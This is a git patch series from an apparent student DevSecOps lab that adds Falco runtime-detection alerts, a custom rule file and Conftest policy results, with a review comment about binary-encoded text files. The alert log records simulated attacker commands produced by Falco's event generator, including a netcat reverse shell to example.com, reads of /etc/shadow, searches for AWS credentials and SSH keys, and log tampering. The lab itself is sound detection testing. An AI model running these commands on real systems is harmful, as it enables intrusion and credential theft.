From 52b936c68c3dfa56a1436e08ef8432647936f8d6 Mon Sep 17 00:00:00 2001
From: LegendIU <146006113+LegendIU@users.noreply.github.com>
Date: Mon, 9 Feb 2026 17:01:46 +0300
Subject: [PATCH 1/2] docs: add PR template
---
 .github/pull_request_template.md | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 create mode 100644 .github/pull_request_template.md
diff --git a/.github/pull_request_template.md b/.github/pull_request_template.md
new file mode 100644
index 00000000..e69de29b
From 3b6b42083b1a2a75b6c63cb4204958f9683c3f08 Mon Sep 17 00:00:00 2001
From: LegendIU <146006113+LegendIU@users.noreply.github.com>
Date: Mon, 18 May 2026 13:13:59 +0300
Subject: [PATCH 2/2] docs: add lab9 falco runtime and conftest submission
---
 labs/lab9/analysis/conftest-compose.txt | Bin 0 -> 142 bytes
 labs/lab9/analysis/conftest-hardened.txt | Bin 0 -> 142 bytes
 labs/lab9/analysis/conftest-unhardened.txt | Bin 0 -> 2718 bytes
 labs/lab9/analysis/falco-alerts-summary.txt | 22 ++
 labs/lab9/falco/logs/falco.log | Bin 0 -> 76154 bytes
 labs/lab9/falco/rules/custom-rules.yaml | 8 +
 labs/submission9.md | 222 ++++++++++++++++++++
 7 files changed, 252 insertions(+)
 create mode 100644 labs/lab9/analysis/conftest-compose.txt
 create mode 100644 labs/lab9/analysis/conftest-hardened.txt
 create mode 100644 labs/lab9/analysis/conftest-unhardened.txt
 create mode 100644 labs/lab9/analysis/falco-alerts-summary.txt
 create mode 100644 labs/lab9/falco/logs/falco.log
 create mode 100644 labs/lab9/falco/rules/custom-rules.yaml
 create mode 100644 labs/submission9.md
diff --git a/labs/lab9/analysis/conftest-compose.txt b/labs/lab9/analysis/conftest-compose.txt
new file mode 100644
index 0000000000000000000000000000000000000000..39a0485a90f51da35df93d504fec256eb858b1eb
GIT binary patch
literal 142
zcmXYrF%E-33{X0#q>*}gI~HAqH#=9d{qX?ECKqM^
literal 0
HcmV?d00001
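Review bot: The conftest-compose.txt hunk lands a `.txt` artefact as an opaque binary patch (`GIT binary patch`, `literal 142`), so the policy result it is meant to document cannot be read or reviewed in the diff; the diffstat shows the same for conftest-hardened.txt, conftest-unhardened.txt and falco.log (`Bin 0 -> 76154 bytes`), the last of which the summary file quotes as plain JSON lines. Given the `C:\Users\nik52\...` prefixes in the summary, this looks like output redirected from an older Windows PowerShell, which writes UTF-16LE with a BOM by default — worth confirming with a hex dump of the first bytes. Re-saving these captures as UTF-8 (for example `Out-File -Encoding utf8`) would make the evidence reviewable and diffable for graders and future readers. The summary file itself is raw grep output carrying the author's absolute local path on every line; trimming that prefix before committing avoids publishing a local username and machine layout in the repository.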
diff --git a/labs/lab9/analysis/conftest-unhardened.txt b/labs/lab9/analysis/conftest-unhardened.txt new file mode 100644 index 0000000000000000000000000000000000000000..f28fd71719069818d2e4638ae91077849d22db41 GIT binary patch literal 2718 zcmd^>%}&BV6ov2F#3yjmuonDbL)@{D#KfRs2zoucyc>UXBCM2rt$32Dll zxpSxI{(pWP*}V<>xk#Qq(U^C@xu<}1Bwf5JMZLd157Y(z~=c`9&qmJ7}r~jA1 command=sh -lc echo hello-from-shell terminal=34816 exe_flags=EXE_WRITABLE|EXE_LOWER_LAYER container_id=8fa00f9b50d1 container_name=lab9-helper container_image_repository=alpine container_image_tag=3.19 k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"8fa00f9b50d1","container.image.repository":"alpine","container.image.tag":"3.19","container.name":"lab9-helper","evt.arg.flags":"EXE_WRITABLE|EXE_LOWER_LAYER","evt.time.iso8601":1779098706246914546,"evt.type":"execve","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"sh -lc echo hello-from-shell","proc.exepath":"/bin/busybox","proc.name":"sh","proc.pname":null,"proc.tty":34816,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Notice","rule":"Terminal shell in container","source":"syscall","tags":["T1059","container","maturity_stable","mitre_execution","shell"],"time":"2026-05-18T10:05:06.246914546Z"} +C:\Users\nik52\DevSecOps-Intro\labs\lab9\falco\logs\falco.log:55:{"hostname":"55e256ca65a4","output":"2026-05-18T10:05:06.384831254+0000: Warning Falco Custom: File write in /usr/local/bin (container=lab9-helper user=root file=/usr/local/bin/drift.txt flags=O_LARGEFILE|O_TRUNC|O_CREAT|O_WRONLY|O_F_CREATED|FD_UPPER_LAYER) container_id=8fa00f9b50d1 container_name=lab9-helper container_image_repository=alpine container_image_tag=3.19 k8s_pod_name= 
k8s_ns_name=","output_fields":{"container.id":"8fa00f9b50d1","container.image.repository":"alpine","container.image.tag":"3.19","container.name":"lab9-helper","evt.arg.flags":"O_LARGEFILE|O_TRUNC|O_CREAT|O_WRONLY|O_F_CREATED|FD_UPPER_LAYER","evt.time.iso8601":1779098706384831254,"fd.name":"/usr/local/bin/drift.txt","k8s.ns.name":null,"k8s.pod.name":null,"user.name":"root"},"priority":"Warning","rule":"Write Binary Under UsrLocalBin","source":"syscall","tags":["compliance","container","drift"],"time":"2026-05-18T10:05:06.384831254Z"} +C:\Users\nik52\DevSecOps-Intro\labs\lab9\falco\logs\falco.log:56:{"hostname":"55e256ca65a4","output":"2026-05-18T10:05:06.899152300+0000: Warning Falco Custom: File write in /usr/local/bin (container=lab9-helper user=root file=/usr/local/bin/custom-rule.txt flags=O_LARGEFILE|O_TRUNC|O_CREAT|O_WRONLY|O_F_CREATED|FD_UPPER_LAYER) container_id=8fa00f9b50d1 container_name=lab9-helper container_image_repository=alpine container_image_tag=3.19 k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"8fa00f9b50d1","container.image.repository":"alpine","container.image.tag":"3.19","container.name":"lab9-helper","evt.arg.flags":"O_LARGEFILE|O_TRUNC|O_CREAT|O_WRONLY|O_F_CREATED|FD_UPPER_LAYER","evt.time.iso8601":1779098706899152300,"fd.name":"/usr/local/bin/custom-rule.txt","k8s.ns.name":null,"k8s.pod.name":null,"user.name":"root"},"priority":"Warning","rule":"Write Binary Under UsrLocalBin","source":"syscall","tags":["compliance","container","drift"],"time":"2026-05-18T10:05:06.899152300Z"} +C:\Users\nik52\DevSecOps-Intro\labs\lab9\falco\logs\falco.log:58:{"hostname":"55e256ca65a4","output":"2026-05-18T10:06:16.496031027+0000: Notice Disallowed SSH Connection | connection=172.17.0.5:51146->104.20.23.154:443 lport=443 rport=51146 fd_type=ipv4 fd_proto=tcp evt_type=connect user=root user_uid=0 user_loginuid=-1 process=ssh proc_exepath=/usr/bin/ssh parent=event-generator command=ssh user@example.com -p 443 terminal=0 container_id=3e5c6576f4b7 
container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"3e5c6576f4b7","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.time.iso8601":1779098776496031027,"evt.type":"connect","fd.l4proto":"tcp","fd.lport":443,"fd.name":"172.17.0.5:51146->104.20.23.154:443","fd.rport":51146,"fd.type":"ipv4","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"ssh user@example.com -p 443","proc.exepath":"/usr/bin/ssh","proc.name":"ssh","proc.pname":"event-generator","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Notice","rule":"Disallowed SSH Connection Non Standard Port","source":"syscall","tags":["T1059","container","host","maturity_stable","mitre_execution","network","process"],"time":"2026-05-18T10:06:16.496031027Z"} +C:\Users\nik52\DevSecOps-Intro\labs\lab9\falco\logs\falco.log:59:{"hostname":"55e256ca65a4","output":"2026-05-18T10:06:19.042281905+0000: Warning Sensitive file opened for reading by non-trusted program | file=/etc/shadow gparent= ggparent= gggparent= evt_type=openat user=root user_uid=0 user_loginuid=-1 process=event-generator proc_exepath=/usr/bin/event-generator parent=containerd-shim command=event-generator run syscall terminal=0 container_id=3e5c6576f4b7 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"3e5c6576f4b7","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.time.iso8601":1779098779042281905,"evt.type":"openat","fd.name":"/etc/shadow","k8s.ns.name":null,"k8s.pod.name":null,"proc.aname[2]":null,"proc.aname[3]":null,"proc.aname[4]":null,"proc.cmdline":"event-generator run 
syscall","proc.exepath":"/usr/bin/event-generator","proc.name":"event-generator","proc.pname":"containerd-shim","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Read sensitive file untrusted","source":"syscall","tags":["T1555","container","filesystem","host","maturity_stable","mitre_credential_access"],"time":"2026-05-18T10:06:19.042281905Z"} +C:\Users\nik52\DevSecOps-Intro\labs\lab9\falco\logs\falco.log:60:{"hostname":"55e256ca65a4","output":"2026-05-18T10:06:19.143622338+0000: Warning Detected AWS credentials search activity | proc_pcmdline=event-generator run syscall proc_cwd=/ group_gid=0 group_name=root user_loginname= evt_type=execve user=root user_uid=0 user_loginuid=-1 process=find proc_exepath=/usr/bin/find parent=event-generator command=find /tmp -maxdepth 1 -iname .aws/credentials terminal=0 exe_flags=EXE_WRITABLE|EXE_LOWER_LAYER container_id=3e5c6576f4b7 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"3e5c6576f4b7","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.arg.flags":"EXE_WRITABLE|EXE_LOWER_LAYER","evt.time.iso8601":1779098779143622338,"evt.type":"execve","group.gid":0,"group.name":"root","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"find /tmp -maxdepth 1 -iname .aws/credentials","proc.cwd":"/","proc.exepath":"/usr/bin/find","proc.name":"find","proc.pcmdline":"event-generator run syscall","proc.pname":"event-generator","proc.tty":0,"user.loginname":"","user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Find AWS Credentials","source":"syscall","tags":["T1552","aws","container","host","maturity_stable","mitre_credential_access","process"],"time":"2026-05-18T10:06:19.143622338Z"} 
+C:\Users\nik52\DevSecOps-Intro\labs\lab9\falco\logs\falco.log:61:{"hostname":"55e256ca65a4","output":"2026-05-18T10:06:19.249241238+0000: Warning Symlinks created over sensitive files | target=/etc linkpath=/tmp/falco-event-generator-syscall-CreateSymlinkOverSensitiveFiles-1650920846/etc_link evt_type=symlinkat user=root user_uid=0 user_loginuid=-1 process=ln proc_exepath=/usr/bin/ln parent=event-generator command=ln -s /etc /tmp/falco-event-generator-syscall-CreateSymlinkOverSensitiveFiles-1650920846/etc_link terminal=0 container_id=3e5c6576f4b7 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"3e5c6576f4b7","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.arg.linkpath":"/tmp/falco-event-generator-syscall-CreateSymlinkOverSensitiveFiles-1650920846/etc_link","evt.arg.target":"/etc","evt.time.iso8601":1779098779249241238,"evt.type":"symlinkat","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"ln -s /etc /tmp/falco-event-generator-syscall-CreateSymlinkOverSensitiveFiles-1650920846/etc_link","proc.exepath":"/usr/bin/ln","proc.name":"ln","proc.pname":"event-generator","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Create Symlink Over Sensitive Files","source":"syscall","tags":["T1555","container","filesystem","host","maturity_stable","mitre_credential_access"],"time":"2026-05-18T10:06:19.249241238Z"} +C:\Users\nik52\DevSecOps-Intro\labs\lab9\falco\logs\falco.log:62:{"hostname":"55e256ca65a4","output":"2026-05-18T10:06:25.386641120+0000: Warning Sensitive file opened for reading by trusted program after startup | file=/etc/shadow pcmdline=event-generator run syscall gparent=containerd-shim ggparent= gggparent= evt_type=openat user=root user_uid=0 user_loginuid=-1 process=httpd proc_exepath=/usr/bin/event-generator 
parent=event-generator command=httpd --loglevel info run ^syscall.ReadSensitiveFileUntrusted$ --sleep 6s terminal=0 container_id=3e5c6576f4b7 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"3e5c6576f4b7","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.time.iso8601":1779098785386641120,"evt.type":"openat","fd.name":"/etc/shadow","k8s.ns.name":null,"k8s.pod.name":null,"proc.aname[2]":"containerd-shim","proc.aname[3]":null,"proc.aname[4]":null,"proc.cmdline":"httpd --loglevel info run ^syscall.ReadSensitiveFileUntrusted$ --sleep 6s","proc.exepath":"/usr/bin/event-generator","proc.name":"httpd","proc.pcmdline":"event-generator run syscall","proc.pname":"event-generator","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Read sensitive file trusted after startup","source":"syscall","tags":["T1555","container","filesystem","host","maturity_stable","mitre_credential_access"],"time":"2026-05-18T10:06:25.386641120Z"} +C:\Users\nik52\DevSecOps-Intro\labs\lab9\falco\logs\falco.log:63:{"hostname":"55e256ca65a4","output":"2026-05-18T10:06:25.491751267+0000: Warning Bulk data has been removed from disk | file= evt_type=execve user=root user_uid=0 user_loginuid=-1 process=shred proc_exepath=/usr/bin/shred parent=event-generator command=shred -u /tmp/falco-event-generator-syscall-RemoveBulkDataFromDisk-347364980 terminal=0 exe_flags=EXE_WRITABLE|EXE_LOWER_LAYER container_id=3e5c6576f4b7 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name= 
k8s_ns_name=","output_fields":{"container.id":"3e5c6576f4b7","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.arg.flags":"EXE_WRITABLE|EXE_LOWER_LAYER","evt.time.iso8601":1779098785491751267,"evt.type":"execve","fd.name":null,"k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"shred -u /tmp/falco-event-generator-syscall-RemoveBulkDataFromDisk-347364980","proc.exepath":"/usr/bin/shred","proc.name":"shred","proc.pname":"event-generator","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Remove Bulk Data from Disk","source":"syscall","tags":["T1485","container","filesystem","host","maturity_stable","mitre_impact","process"],"time":"2026-05-18T10:06:25.491751267Z"} +C:\Users\nik52\DevSecOps-Intro\labs\lab9\falco\logs\falco.log:64:{"hostname":"55e256ca65a4","output":"2026-05-18T10:06:26.063678586+0000: Notice Packet socket was created in a container | socket_info=fd=7() domain=17(AF_PACKET) type=3 proto=3 connection= lport= rport= fd_type= fd_proto= evt_type=socket user=root user_uid=0 user_loginuid=-1 process=event-generator proc_exepath=/usr/bin/event-generator parent=containerd-shim command=event-generator run syscall terminal=0 container_id=3e5c6576f4b7 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"3e5c6576f4b7","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.args":"fd=7() domain=17(AF_PACKET) type=3 proto=3","evt.time.iso8601":1779098786063678586,"evt.type":"socket","fd.l4proto":"","fd.lport":null,"fd.name":"","fd.rport":null,"fd.type":"","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"event-generator run 
syscall","proc.exepath":"/usr/bin/event-generator","proc.name":"event-generator","proc.pname":"containerd-shim","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Notice","rule":"Packet socket created in container","source":"syscall","tags":["T1557.002","container","maturity_stable","mitre_credential_access","network"],"time":"2026-05-18T10:06:26.063678586Z"} +C:\Users\nik52\DevSecOps-Intro\labs\lab9\falco\logs\falco.log:65:{"hostname":"55e256ca65a4","output":"2026-05-18T10:06:26.178106980+0000: Warning Read monitored file via directory traversal | file=/etc/shadow fileraw=/etc/../etc/../etc/shadow gparent= ggparent= gggparent= evt_type=openat user=root user_uid=0 user_loginuid=-1 process=event-generator proc_exepath=/usr/bin/event-generator parent=containerd-shim command=event-generator run syscall terminal=0 container_id=3e5c6576f4b7 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"3e5c6576f4b7","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.time.iso8601":1779098786178106980,"evt.type":"openat","fd.name":"/etc/shadow","fd.nameraw":"/etc/../etc/../etc/shadow","k8s.ns.name":null,"k8s.pod.name":null,"proc.aname[2]":null,"proc.aname[3]":null,"proc.aname[4]":null,"proc.cmdline":"event-generator run syscall","proc.exepath":"/usr/bin/event-generator","proc.name":"event-generator","proc.pname":"containerd-shim","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Directory traversal monitored file read","source":"syscall","tags":["T1555","container","filesystem","host","maturity_stable","mitre_credential_access"],"time":"2026-05-18T10:06:26.178106980Z"} +C:\Users\nik52\DevSecOps-Intro\labs\lab9\falco\logs\falco.log:66:{"hostname":"55e256ca65a4","output":"2026-05-18T10:06:26.410854429+0000: Notice Shell spawned 
by untrusted binary | parent_exe=/tmp/falco-event-generator-syscall-spawned-132851378/httpd parent_exepath=/usr/bin/event-generator pcmdline=httpd --loglevel info run ^helper.RunShell$ gparent=event-generator ggparent=containerd-shim aname[4]= aname[5]= aname[6]= aname[7]= evt_type=execve user=root user_uid=0 user_loginuid=-1 process=sh proc_exepath=/usr/bin/dash parent=httpd command=sh -c ls > /dev/null terminal=0 exe_flags=EXE_WRITABLE|EXE_LOWER_LAYER container_id=3e5c6576f4b7 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"3e5c6576f4b7","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.arg.flags":"EXE_WRITABLE|EXE_LOWER_LAYER","evt.time.iso8601":1779098786410854429,"evt.type":"execve","k8s.ns.name":null,"k8s.pod.name":null,"proc.aname[2]":"event-generator","proc.aname[3]":"containerd-shim","proc.aname[4]":null,"proc.aname[5]":null,"proc.aname[6]":null,"proc.aname[7]":null,"proc.cmdline":"sh -c ls > /dev/null","proc.exepath":"/usr/bin/dash","proc.name":"sh","proc.pcmdline":"httpd --loglevel info run ^helper.RunShell$","proc.pexe":"/tmp/falco-event-generator-syscall-spawned-132851378/httpd","proc.pexepath":"/usr/bin/event-generator","proc.pname":"httpd","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Notice","rule":"Run shell untrusted","source":"syscall","tags":["T1059.004","container","host","maturity_stable","mitre_execution","process","shell"],"time":"2026-05-18T10:06:26.410854429Z"} +C:\Users\nik52\DevSecOps-Intro\labs\lab9\falco\logs\falco.log:67:{"hostname":"55e256ca65a4","output":"2026-05-18T10:06:26.630400557+0000: Warning Debugfs launched started in a privileged container | evt_type=execve user=root user_uid=0 user_loginuid=-1 process=debugfs proc_exepath=/usr/sbin/debugfs parent=event-generator command=debugfs -V terminal=0 
exe_flags=EXE_WRITABLE|EXE_LOWER_LAYER container_id=3e5c6576f4b7 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"3e5c6576f4b7","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.arg.flags":"EXE_WRITABLE|EXE_LOWER_LAYER","evt.time.iso8601":1779098786630400557,"evt.type":"execve","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"debugfs -V","proc.exepath":"/usr/sbin/debugfs","proc.name":"debugfs","proc.pname":"event-generator","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Debugfs Launched in Privileged Container","source":"syscall","tags":["T1611","cis","container","maturity_stable","mitre_privilege_escalation","process"],"time":"2026-05-18T10:06:26.630400557Z"} +C:\Users\nik52\DevSecOps-Intro\labs\lab9\falco\logs\falco.log:68:{"hostname":"55e256ca65a4","output":"2026-05-18T10:06:26.733723085+0000: Warning Grep private keys or passwords activities found | evt_type=execve user=root user_uid=0 user_loginuid=-1 process=find proc_exepath=/usr/bin/find parent=event-generator command=find /tmp -maxdepth 1 -iname id_rsa terminal=0 exe_flags=EXE_WRITABLE|EXE_LOWER_LAYER container_id=3e5c6576f4b7 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"3e5c6576f4b7","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.arg.flags":"EXE_WRITABLE|EXE_LOWER_LAYER","evt.time.iso8601":1779098786733723085,"evt.type":"execve","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"find /tmp -maxdepth 1 -iname 
id_rsa","proc.exepath":"/usr/bin/find","proc.name":"find","proc.pname":"event-generator","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Search Private Keys or Passwords","source":"syscall","tags":["T1552.001","container","filesystem","host","maturity_stable","mitre_credential_access","process"],"time":"2026-05-18T10:06:26.733723085Z"} +C:\Users\nik52\DevSecOps-Intro\labs\lab9\falco\logs\falco.log:69:{"hostname":"55e256ca65a4","output":"2026-05-18T10:06:27.008250571+0000: Critical Fileless execution via memfd_create | container_start_ts=1779098775142151461 proc_cwd=/ evt_res=SUCCESS proc_sname=event-generator gparent=containerd-shim evt_type=execve user=root user_uid=0 user_loginuid=-1 process=4 proc_exepath=memfd:program parent=event-generator command=4 run helper.DoNothing terminal=0 exe_flags=EXE_WRITABLE|EXE_FROM_MEMFD container_id=3e5c6576f4b7 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"3e5c6576f4b7","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","container.start_ts":1779098775142151461,"evt.arg.flags":"EXE_WRITABLE|EXE_FROM_MEMFD","evt.res":"SUCCESS","evt.time.iso8601":1779098787008250571,"evt.type":"execve","k8s.ns.name":null,"k8s.pod.name":null,"proc.aname[2]":"containerd-shim","proc.cmdline":"4 run helper.DoNothing","proc.cwd":"/","proc.exepath":"memfd:program","proc.name":"4","proc.pname":"event-generator","proc.sname":"event-generator","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Critical","rule":"Fileless execution via memfd_create","source":"syscall","tags":["T1620","container","host","maturity_stable","mitre_defense_evasion","process"],"time":"2026-05-18T10:06:27.008250571Z"} 
+C:\Users\nik52\DevSecOps-Intro\labs\lab9\falco\logs\falco.log:70:{"hostname":"55e256ca65a4","output":"2026-05-18T10:06:27.275454053+0000: Warning Log files were tampered | file=/tmp/falco-event-generator-syscall-ClearLogActivities-1244904050/syslog evt_type=openat user=root user_uid=0 user_loginuid=-1 process=event-generator proc_exepath=/usr/bin/event-generator parent=containerd-shim command=event-generator run syscall terminal=0 container_id=3e5c6576f4b7 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"3e5c6576f4b7","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.time.iso8601":1779098787275454053,"evt.type":"openat","fd.name":"/tmp/falco-event-generator-syscall-ClearLogActivities-1244904050/syslog","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"event-generator run syscall","proc.exepath":"/usr/bin/event-generator","proc.name":"event-generator","proc.pname":"containerd-shim","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Clear Log Activities","source":"syscall","tags":["NIST_800-53_AU-10","T1070","container","filesystem","host","maturity_stable","mitre_defense_evasion"],"time":"2026-05-18T10:06:27.275454053Z"} +C:\Users\nik52\DevSecOps-Intro\labs\lab9\falco\logs\falco.log:71:{"hostname":"55e256ca65a4","output":"2026-05-18T10:06:27.380891865+0000: Warning Detected ptrace PTRACE_ATTACH attempt | proc_pcmdline=containerd-shim -namespace moby -id 3e5c6576f4b70af76465da54304dc19bc5083024e730bcc2cf0574d8c758452a -address /run/containerd/containerd.sock evt_type=ptrace user=root user_uid=0 user_loginuid=-1 process=event-generator proc_exepath=/usr/bin/event-generator parent=containerd-shim command=event-generator run syscall terminal=0 container_id=3e5c6576f4b7 container_name=eventgen 
container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"3e5c6576f4b7","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.time.iso8601":1779098787380891865,"evt.type":"ptrace","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"event-generator run syscall","proc.exepath":"/usr/bin/event-generator","proc.name":"event-generator","proc.pcmdline":"containerd-shim -namespace moby -id 3e5c6576f4b70af76465da54304dc19bc5083024e730bcc2cf0574d8c758452a -address /run/containerd/containerd.sock","proc.pname":"containerd-shim","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"PTRACE attached to process","source":"syscall","tags":["T1055.008","container","host","maturity_stable","mitre_privilege_escalation","process"],"time":"2026-05-18T10:06:27.380891865Z"} +C:\Users\nik52\DevSecOps-Intro\labs\lab9\falco\logs\falco.log:72:{"hostname":"55e256ca65a4","output":"2026-05-18T10:06:27.597800392+0000: Warning Netcat runs inside container that allows remote code execution | evt_type=execve user=root user_uid=0 user_loginuid=-1 process=nc proc_exepath=/usr/bin/nc.openbsd parent=event-generator command=nc -e /bin/sh example.com 22 terminal=0 exe_flags=EXE_WRITABLE|EXE_LOWER_LAYER container_id=3e5c6576f4b7 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"3e5c6576f4b7","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.arg.flags":"EXE_WRITABLE|EXE_LOWER_LAYER","evt.time.iso8601":1779098787597800392,"evt.type":"execve","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"nc -e /bin/sh example.com 
22","proc.exepath":"/usr/bin/nc.openbsd","proc.name":"nc","proc.pname":"event-generator","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Netcat Remote Code Execution in Container","source":"syscall","tags":["T1059","container","maturity_stable","mitre_execution","network","process"],"time":"2026-05-18T10:06:27.597800392Z"} +C:\Users\nik52\DevSecOps-Intro\labs\lab9\falco\logs\falco.log:73:{"hostname":"55e256ca65a4","output":"2026-05-18T10:06:27.706351106+0000: Warning Hardlinks created over sensitive files | target=/etc/shadow linkpath=/tmp/falco-event-generator-syscall-CreateHardlinkOverSensitiveFiles-1799659394/shadow_link evt_type=linkat user=root user_uid=0 user_loginuid=-1 process=ln proc_exepath=/usr/bin/ln parent=event-generator command=ln -v /etc/shadow /tmp/falco-event-generator-syscall-CreateHardlinkOverSensitiveFiles-1799659394/shadow_link terminal=0 container_id=3e5c6576f4b7 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"3e5c6576f4b7","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.arg.newpath":"/tmp/falco-event-generator-syscall-CreateHardlinkOverSensitiveFiles-1799659394/shadow_link","evt.arg.oldpath":"/etc/shadow","evt.time.iso8601":1779098787706351106,"evt.type":"linkat","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"ln -v /etc/shadow /tmp/falco-event-generator-syscall-CreateHardlinkOverSensitiveFiles-1799659394/shadow_link","proc.exepath":"/usr/bin/ln","proc.name":"ln","proc.pname":"event-generator","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Create Hardlink Over Sensitive Files","source":"syscall","tags":["T1555","container","filesystem","host","maturity_stable","mitre_credential_access"],"time":"2026-05-18T10:06:27.706351106Z"} 
+C:\Users\nik52\DevSecOps-Intro\labs\lab9\falco\logs\falco.log:74:{"hostname":"55e256ca65a4","output":"2026-05-18T10:06:27.810568831+0000: Notice Detected potential PTRACE_TRACEME anti-debug attempt | proc_pcmdline=event-generator run syscall evt_type=ptrace user=root user_uid=0 user_loginuid=-1 process=event-generator proc_exepath=/usr/bin/event-generator parent=event-generator command=event-generator run syscall terminal=0 container_id=3e5c6576f4b7 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"3e5c6576f4b7","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.time.iso8601":1779098787810568831,"evt.type":"ptrace","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"event-generator run syscall","proc.exepath":"/usr/bin/event-generator","proc.name":"event-generator","proc.pcmdline":"event-generator run syscall","proc.pname":"event-generator","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Notice","rule":"PTRACE anti-debug attempt","source":"syscall","tags":["T1622","container","host","maturity_stable","mitre_defense_evasion","process"],"time":"2026-05-18T10:06:27.810568831Z"} +C:\Users\nik52\DevSecOps-Intro\labs\lab9\falco\logs\falco.log:75:{"hostname":"55e256ca65a4","output":"2026-05-18T10:06:28.016238773+0000: Warning File execution detected from /dev/shm | evt_res=SUCCESS file= proc_cwd=/ proc_pcmdline=event-generator run syscall user_loginname= group_gid=0 group_name=root evt_type=execve user=root user_uid=0 user_loginuid=-1 process=sh proc_exepath=/usr/bin/dash parent=event-generator 